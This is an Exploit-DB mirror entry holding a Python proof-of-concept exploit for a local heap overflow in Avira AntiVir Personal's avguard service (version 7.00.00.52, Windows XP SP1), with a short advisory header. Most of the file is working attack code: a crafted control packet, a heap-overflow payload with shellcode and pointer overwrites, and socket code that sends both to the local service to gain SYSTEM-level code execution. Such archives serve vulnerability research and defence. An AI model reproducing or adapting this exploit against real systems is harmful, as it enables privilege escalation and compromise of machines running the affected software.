exploit-db-mirror/exploits/windows/remote/35226.py

source: https://www.securityfocus.com/bid/45807/info

Avira AntiVir Personal is prone to multiple code-execution vulnerabilities.

Successful exploits may allow an attacker to execute arbitrary code with SYSTEM-level privileges. Failed exploit attempts will likely result in denial-of-service conditions.

Please note that these issues affect versions of the application that are no longer supported.

#
# Avira AntiVir personal edition avguard.exe 7.00.00.52 local heap overflow
# Proof of Concept (PoC) exploit / target: WinXP SP1
# bug discovered/exploit written by D.Elser
#
# by sending two simple TCP packets which will
# exploit a vulnerability in the Antivir guard
# service, the user will gain SYSTEM privileges
#
# this PoC code will cause the avguard service
# to show a messagebox within an infinite loop


from socket import *
import sys

# the first packet which is sent must
# contain a magic ID at offset 0x18
# and the length of the second packet
# to receive
#
# offset 0x18 : magic ID
# offset 0x1C : length of buffer for second packet


cpacket = "\x00\x00\x00\x00" \
          "\x00\x00\x00\x00" \
          "\x00\x00\x00\x00" \
          "\x00\x00\x00\x00" \
          "\x00\x00\x00\x00" \
          "\x00\x00\x00\x00" \
          "\x00\x00\x31\x06" \
          "\x00\x00\x00\x40"


lyrics = "\x42\x72\x65\x61\x6B\x62\x65\x61\x74\x20\x45\x72\x61\x20\x2D\x20" \
         "\x42\x75\x6C\x6C\x69\x74\x70\x72\x6F\x6F\x66\x0D\x0A\x0D\x0A\x45" \
         "\x6C\x65\x63\x74\x72\x69\x66\x79\x20\x6D\x65\x20\x79\x6F\x75\x20" \
         "\x6D\x79\x20\x68\x61\x6C\x66\x20\x62\x61\x6B\x65\x64\x20\x79\x6F" \
         "\x75\x74\x68\x0D\x0A\x49\x20\x6D\x65\x6D\x6F\x72\x69\x73\x65\x20" \
         "\x79\x6F\x75\x72\x20\x66\x61\x63\x65\x20\x73\x6F\x20\x49\x20\x77" \
         "\x6F\x6E\x27\x74\x20\x66\x6F\x72\x67\x65\x74\x20\x79\x6F\x75\x0D" \
         "\x0A\x44\x61\x6E\x63\x69\x6E\x67\x20\x64\x65\x6D\x6F\x6E\x73\x20" \
         "\x69\x6E\x20\x74\x68\x65\x20\x66\x69\x72\x65\x6C\x69\x67\x68\x74" \
         "\x20\x79\x65\x73\x20\x69\x74\x27\x73\x20\x74\x72\x75\x65\x0D\x0A" \
         "\x52\x65\x6D\x69\x6E\x64\x20\x6D\x65\x20\x6F\x66\x20\x74\x68\x65" \
         "\x20\x6E\x69\x67\x68\x74\x20\x49\x20\x66\x69\x72\x73\x74\x20\x6D" \
         "\x65\x74\x20\x79\x6F\x75\x0D\x0A\x43\x72\x69\x74\x69\x63\x69\x73" \
         "\x65\x20\x6D\x65\x20\x66\x6F\x72\x20\x6D\x79\x20\x6D\x69\x73\x2D" \
         "\x73\x70\x65\x6E\x74\x20\x79\x6F\x75\x74\x68\x0D\x0A\x4E\x6F\x20" \
         "\x74\x68\x72\x69\x6C\x6C\x20\x6E\x6F\x20\x6C\x69\x65\x20\x6D\x6F" \
         "\x72\x65\x20\x63\x72\x61\x7A\x79\x20\x74\x68\x61\x6E\x20\x74\x68" \
         "\x65\x20\x74\x72\x75\x74\x68\x0D\x0A\x59\x6F\x75\x20\x67\x69\x76" \
         "\x65\x20\x6D\x65\x20\x70\x72\x65\x63\x69\x6F\x75\x73\x20\x74\x68" \
         "\x69\x6E\x67\x73\x20\x49\x20\x74\x68\x72\x6F\x77\x20\x74\x68\x65" \
         "\x6D\x20\x61\x6C\x6C\x20\x61\x77\x61\x79\x0D\x0A\x41\x6E\x64\x20" \
         "\x6E\x6F\x77\x20\x79\x6F\x75\x20\x66\x72\x65\x65\x20\x6D\x79\x20" \
         "\x62\x72\x65\x61\x74\x68\x20\x79\x6F\x75\x72\x20\x73\x63\x61\x72" \
         "\x65\x64\x20\x77\x68\x61\x74\x20\x49\x20\x6D\x69\x67\x68\x74\x20" \
         "\x73\x61\x79\x0D\x0A\x0D\x0A\x53\x70\x65\x61\x6B\x20\x6E\x6F\x20" \
         "\x6C\x69\x65\x2C\x20\x49\x20\x74\x65\x6C\x6C\x20\x74\x68\x65\x20" \
         "\x74\x72\x75\x74\x68\x0D\x0A\x53\x61\x76\x65\x20\x6D\x79\x20\x62" \
         "\x72\x65\x61\x74\x68\x20\x79\x6F\x75\x20\x62\x72\x65\x61\x6B\x20" \
         "\x74\x68\x65\x20\x72\x75\x6C\x65\x73\x0D\x0A\x54\x69\x6D\x65\x20" \
         "\x77\x69\x6C\x6C\x20\x74\x65\x6C\x6C\x20\x79\x65\x61\x68\x20\x77" \
         "\x68\x6F\x20\x69\x73\x20\x77\x68\x6F\x0D\x0A\x53\x69\x64\x65\x20" \
         "\x62\x79\x20\x73\x69\x64\x65\x20\x77\x65\x27\x72\x65\x20\x62\x75" \
         "\x6C\x6C\x69\x74\x70\x72\x6F\x6F\x66\x00"


# main part of shellcode
shellcode = "\x90\x8d\x46\x1b" \
            "\x50\x05\x04\x00" \
            "\x00\x00\x50\x05" \
            "\x19\x00\x00\x00" \
            "\x50\xb8\x2f\x71" \
            "\x42\x00\xff\xd0" \
            "\x90\xeb\xe5\x10" \
            "\x20\x01\x00" \
            "I got SYSTEM privileges!\x00" + lyrics

# fill shellcode up to a specific length
for i in range(0, 0x4000 - 0x20 - len(shellcode)):
	shellcode = shellcode + "\x40"

# second part of shellcode which contains
# the pointers to be overwritten and code
# which jumps to main part of our shellcode
shellcode = shellcode + "\xEB\x0E\x90\x90" \
                        "\x90\x90\x90\x90" \
                        "\x52\xBF\x04\x78" \
                        "\xB4\x73\xED\x77" \
                        "\x8B\x57\x6C\x8B" \
                        "\xF2\x81\xEE\xE0" \
                        "\x3F\x00\x00\xFF" \
                        "\xE6\x90\x90\x90" \
                        "\x90\x90\x90\x90" \
                        "\x90\x90\x90\x90" \


s = socket(AF_INET,SOCK_STREAM)
s.settimeout(1)
s.connect(("127.0.0.1",18350))
print "Avira Antivir avguard.exe 7.00.00.52 local heap overflow.\n" \
      "Exploit compatible with XP SP1.\n"

print "Sending control packet (size: 0x%x)" % (len(cpacket))
s.sendall(cpacket)
print "Sending shellcode packet (size: 0x%x)" % (len(shellcode))
s.sendall(shellcode)
print "avguard response:"
print s.recv(1024)
sys.exit()